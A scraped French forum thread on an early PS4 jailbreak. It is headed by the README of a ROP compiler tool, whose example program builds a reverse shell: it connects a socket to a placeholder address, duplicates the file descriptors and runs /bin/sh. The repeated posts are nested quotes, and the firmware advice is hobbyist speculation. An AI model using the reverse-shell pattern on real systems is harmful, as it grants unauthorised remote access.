PRO: PROgramming ROP like a PROThis is a crappy tool used in our private PS4 jailbreak. Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process. We have to write the kernel exploitation in ROP, like what has been done in HENKaku jailbreak.Buildpip install git+https://github.com/chaitin/proIf you have modified the pro.g4 file, use the following commands to generate new lexer and parser.cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4Examplestoy {{% include "gadgets.pro" %}{% include "glibc.pro" %}const AF_INET(2);const SOCK_STREAM(1);const IPPROTO_IP(0);var fd;socket(AF_INET, SOCK_STREAM, IPPROTO_IP);func store_rdx_rax<libc, 0x0002e60c, "rdx,rax::">;store_rdx_rax(&fd, undefined);printf("socket fd = %d\n", fd);array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"];connect(fd, addr, 0x10);{% for i in range(3): %}dup2(fd, {{i}});{% endfor %}system("/bin/sh");exit(1);}UsageA BIG TODO. Just try and learn by yourself.Quick GuideAll expressions should be evaluated during compilation, Const/Func should be initialized in declaration.Func is initialized with . Base/Offset is used for relocation, Signature determines the calling convention of Func.Array can be declared with size(Int) or directly initialized with its content(String).For loop should be written in template script, it will be rendered before compilation. For more information, check Jinja2.
bon et pour les simple users comme moi, on fait quoi maintenant????
Mais c'est que ça sent super bon tout ça !!!!!!! Une console "next gen" hackée avec une architecture x86 me rappel une certaine console qui ressemblait à un tank je rêve d'un coinops sur une console HD !
oui mais là elle est jailbreaké, le reste pourrait aller très vite, regardes avec la vita, la vitesse que the flow à mis pour sortir le 2.0 avant mai dump.Yep,comme dis précédemment le code sur le github est incomplet pour l'instant.
un screen que j'ai fais de la shout de psxhax qui en parle
https://gyazo.com/77...803462eb586044b
la question qui se pose maintenant, c'est: est-ce que la pro qui sort le 10 novembre, donc dans 15 jours sera en FW >4.01 ?......
ça peut valoir le coup d'attendre quelques jours et ensuite si besoin faire la chasse aux packs dans les magasins
yep bzé, ça na pas de rapport avec les dumpers de tool ^^ la on parle de l'exploit en lui même,les hackeurs ont expliquer que leur exploit fonctionner de façon assez similaire à HENkaku,et comme le dit la news sur leur github il y a l'outil qui permet l'exploit,mais cet outil est incomplet et on ne peux rien en tirer a l’état actuel.oui mais là elle est jailbreaké, le reste pourrait aller très vite, regardes avec la vita, la vitesse que the flow à mis pour sortir le 2.0 avant mai dump.il y a une petite guerre qui s'installe...à suivreYep,comme dis précédemment le code sur le github est incomplet pour l'instant. un screen que j'ai fais de la shout de psxhax qui en parlehttps://gyazo.com/77...803462eb586044b
écoute rim ! je vais faire court car je ne veux pas du tout partir comme l'autre cretin là où tu sais. je cite simplement un exemple de la vitesse (potentielle) à la quelle cela pourrait aller.je n'ai pas du tout confondu (dans le sens mélangé) les dumpers et l'exploit.en gros ce que je dit, c'est qu'on aura peut-être affaire à qq hacker et dev qui vont se la jouer à qui à la plus grosse genre le comportement de the flow par rapport au chinois (dixit the flow). la scène s'accélère à mon sens. et qd bien même? qui dit que personne ne détient un dump bien au chaud ?henkaku = +- juillet 2016 2 mois plus tard, the flow, une semaine après mai dump...même si tu multiplie par 10 ou peu importe, je pense connaître la suite logique un jour ou l'autre.yep bzé, ça na pas de rapport avec les dumpers de tool ^^ la on parle de l'exploit en lui même,les hackeurs ont expliquer que leur exploit fonctionner de façon assez similaire à HENkaku,et comme le dit la news sur leur github il y a l'outil qui permet l'exploit,mais cet outil est incomplet et on ne peux rien en tirer a l’état actuel.de plus même si on a l'exploit (jailbreak)(linux),ça veux pas du tout dire qu'on aura un dumper comme Vitamine ou MaiDump tool,la ps4 contient une sécurité qui s'appelle SAMU(Sécurity assets management unit)cet sécurité n'est pas présente sur la PS vita or elle l'est sur la ps4 et elle gère tout ce qui est signature de jeux hombrews savegame etc etc et même avec un exploit kernel on y aura pas accès,,voila pourquoi on ne voit pas de backup de jeux même en 1.76.La fameuse sécurité SAMUhttps://www.google.c...s/US20120102333 ;)j'ai écrit un pavé pour t'expliquer pas pour t'agresser ou te dire que t'avais tort^^ (je prefere préciser au cas ou pour les susceptible qui traîne depuis 2 jours)oui mais là elle est jailbreaké, le reste pourrait aller très vite, regardes avec la vita, la vitesse que the flow à mis pour sortir le 2.0 avant mai dump.il y a une petite guerre qui s'installe...à suivreYep,comme dis précédemment le code sur le github est incomplet pour l'instant. un screen que j'ai fais de la shout de psxhax qui en parlehttps://gyazo.com/77...803462eb586044b
je disait pas tu tout ça pour te remballer au contraire juste pour essayer de vous dire a tous de pas vous enflammez au risque d'etre décu,SAMU est une tres grosse sécurité bien supérieur a ce qu'a connu la ps vita,c'est tout ce que je voulais te dire rien de malécoute rim ! je vais faire court car je ne veux pas du tout partir comme l'autre cretin là où tu sais. je cite simplement un exemple de la vitesse (potentielle) à la que cela pourrait aller.je n'ai pas du tout confondu (dans le sens mélangé) les dumpers et l'exploit.en gros ce que je dit, c'est qu'on aura peut-être affaire à qq hacker et dev qui vont se la jouer à qui à la plus grosse genre le comportement de the flow par rapport au chinois (dixit the flow). la scène s'accélère à mon sens. et qd bien même? qui dit que personne ne détient un dump bien au chaud ?henkaku = +- juillet 2016 2 mois plus tard, the flow, une semaine après mai dump...même si tu multiplie par 10 ou peu importe, je pense connaître la suite logique un jour ou l'autre.yep bzé, ça na pas de rapport avec les dumpers de tool ^^ la on parle de l'exploit en lui même,les hackeurs ont expliquer que leur exploit fonctionner de façon assez similaire à HENkaku,et comme le dit la news sur leur github il y a l'outil qui permet l'exploit,mais cet outil est incomplet et on ne peux rien en tirer a l’état actuel.de plus même si on a l'exploit (jailbreak)(linux),ça veux pas du tout dire qu'on aura un dumper comme Vitamine ou MaiDump tool,la ps4 contient une sécurité qui s'appelle SAMU(Sécurity assets management unit)cet sécurité n'est pas présente sur la PS vita or elle l'est sur la ps4 et elle gère tout ce qui est signature de jeux hombrews savegame etc etc et même avec un exploit kernel on y aura pas accès,,voila pourquoi on ne voit pas de backup de jeux même en 1.76.La fameuse sécurité SAMUhttps://www.google.c...s/US20120102333 ;)j'ai écrit un pavé pour t'expliquer pas pour t'agresser ou te dire que t'avais tort^^ (je prefere préciser au cas ou pour les susceptible qui traîne depuis 2 jours)oui mais là elle est jailbreaké, le reste pourrait aller très vite, regardes avec la vita, la vitesse que the flow à mis pour sortir le 2.0 avant mai dump.il y a une petite guerre qui s'installe...à suivreYep,comme dis précédemment le code sur le github est incomplet pour l'instant. un screen que j'ai fais de la shout de psxhax qui en parlehttps://gyazo.com/77...803462eb586044b
c'est cool ,surtout qu'il s'est emporter pour rien le mec d'hier ^^,non pas du tout pour le hack saturne j'y connais rien du tout.trakasse j'ai rien mal pris! jme ràmène juste pas avec des pseudo connaissances comme l'autre d'hier lol quoi!
par contre ce qui est indéniable, c'est que mm si les recherches n'arrivent à rien, bah elle n'arriverons à rien, mais plus vite.
au moins nous seront fixés et mdr le hack de la saturne ça te parle?
il m'a tué le mec après 21 ans, faut le faire qdmm?!
bien à toi
http://fr.ubergizmo....rn-craques.htmlc'est cool ,surtout qu'il s'est emporter pour rien le mec d'hier ^^,non pas du tout pour le hack saturne j'y connais rien du tout.trakasse j'ai rien mal pris! jme ràmène juste pas avec des pseudo connaissances comme l'autre d'hier lol quoi!
par contre ce qui est indéniable, c'est que mm si les recherches n'arrivent à rien, bah elle n'arriverons à rien, mais plus vite.
au moins nous seront fixés et mdr le hack de la saturne ça te parle?
il m'a tué le mec après 21 ans, faut le faire qdmm?!
bien à toi
Au plaisir bzé !
merci pour la news et aux devs surtout
c'est bien de la part des devs d'avoir communiqué ,le reste tiens plus de l'hypothese pour l'instant surtout..... , ne pas oublier qu'en 2016 l'industrie du jeu video depasse celle du cinema donc ca implique des sommes enormes, des investissements de la part d'entreprises qui legitemement protegent leurs produits avec une armada d'avocats et autres juristes specialisés .
le hack s'adapte aussi a cette situation ce qui n'empeche pas des recherches continues de la part de devs , les exploits font de toute façon evoluer les choses apres c'est sure c'est pas encore "le lancement du jeu avec le hdd " , pas evident à mon avis de casser les securités de la console comme ca ( je rejoins rim-k06 la dessus )
vivement la suite
c'est un bel exploit,c'est beau de voir des devs ne rien lâcher 20 ans après,y'a des sécurité incroyable c'est fou 20 ans.http://fr.ubergizmo....rn-craques.htmlc'est cool ,surtout qu'il s'est emporter pour rien le mec d'hier ^^,non pas du tout pour le hack saturne j'y connais rien du tout.trakasse j'ai rien mal pris! jme ràmène juste pas avec des pseudo connaissances comme l'autre d'hier lol quoi!
par contre ce qui est indéniable, c'est que mm si les recherches n'arrivent à rien, bah elle n'arriverons à rien, mais plus vite.
au moins nous seront fixés et mdr le hack de la saturne ça te parle?
il m'a tué le mec après 21 ans, faut le faire qdmm?!
bien à toi
Au plaisir bzé !
Personne ne parle de henkaku???Oki bain vu se que je voit je vais laissez ma ps4 en 3.15 au moin jsuis sur que il aura quelque chose qui sortira ...dommage pour le tombe raider que j'ai achetez il demande de passez à jour en 3.50 ,mais jsuis pas trop chaud .... du coup henkaku marche til sur ma console??
bon et pour les simple users comme moi, on fait quoi maintenant????
bon et pour les simple users comme moi, on fait quoi maintenant????
Clé USB Jailbreak ou puce Jailbreaik etc. à commander... On verra bien.
bon et pour les simple users comme moi, on fait quoi maintenant????
Clé USB Jailbreak ou puce Jailbreaik etc. à commander... On verra bien.
Pour le moment il n'y a rien à faire et y'a encore un peu de chemin et des faille à trouver avant qu'on puisse en faire quelque chose.
à moins que je me trompe, actuellement, il n'y a pas besoin de matériel spécifique ou de soudure pour utiliser l'exploit kernel.
La ps4 est une console bien différente de la ps3 et les méthodes de hack seront elles aussi différentes comme chaque consoles. ça peut etre une puce, un flash avec soudure ou une installation non persistante (comme sur vita ou wiiU) mais pour le moment on ne sait rien.
@Jean71160 : Il n'y a pas de henkaku pour l'instant et oui, à moins qu'un nouvelle faille soit découverte entre 1.76 et 3.55, tu peux mettre à jour en 3.55 pour tomb raider car nous avons une faille sur ce firmware.
Comment on passe en 4.01?
Je suis en 3.25 ou un truc comme ça
Si c'est le même genre de faille que henkaku, il suffit d un jeu demandant le fw 4,05 et hop, adieu le hack ps4. Surtout que 60% des fonctionnalités ps4 utilisent internet. Ca va être difficile de ne pas craquer. Sans parler des jeux extrêmement lourds a télécharger donc il faudra investir dans des supports de stockage externe. Wait & see...
Moi qui voulait attendre la sortie de la ps4 pro pour échanger ma vielle ps4 lol
Merci pour ce info si importantComment on passe en 4.01?
Je suis en 3.25 ou un truc comme ça
Ne met pas encore a jour attend du concret avant...
Et surtout ne met pas a jour au dessus de 3.55...
On ne possède pas d exploit webkit sur 4.00 et 4.01...
Alors que sur 3.55 on l a il manque juste la faille kernel qui arrive...
Si c'est le même genre de faille que henkaku, il suffit d un jeu demandant le fw 4,05 et hop, adieu le hack ps4. Surtout que 60% des fonctionnalités ps4 utilisent internet. Ca va être difficile de ne pas craquer. Sans parler des jeux extrêmement lourds a télécharger donc il faudra investir dans des supports de stockage externe. Wait & see...
Moi qui voulait attendre la sortie de la ps4 pro pour échanger ma vielle ps4 lol
Si c'est le même genre de faille que henkaku, il suffit d un jeu demandant le fw 4,05 et hop, adieu le hack ps4. Surtout que 60% des fonctionnalités ps4 utilisent internet. Ca va être difficile de ne pas craquer. Sans parler des jeux extrêmement lourds a télécharger donc il faudra investir dans des supports de stockage externe. Wait & see...
Moi qui voulait attendre la sortie de la ps4 pro pour échanger ma vielle ps4 lol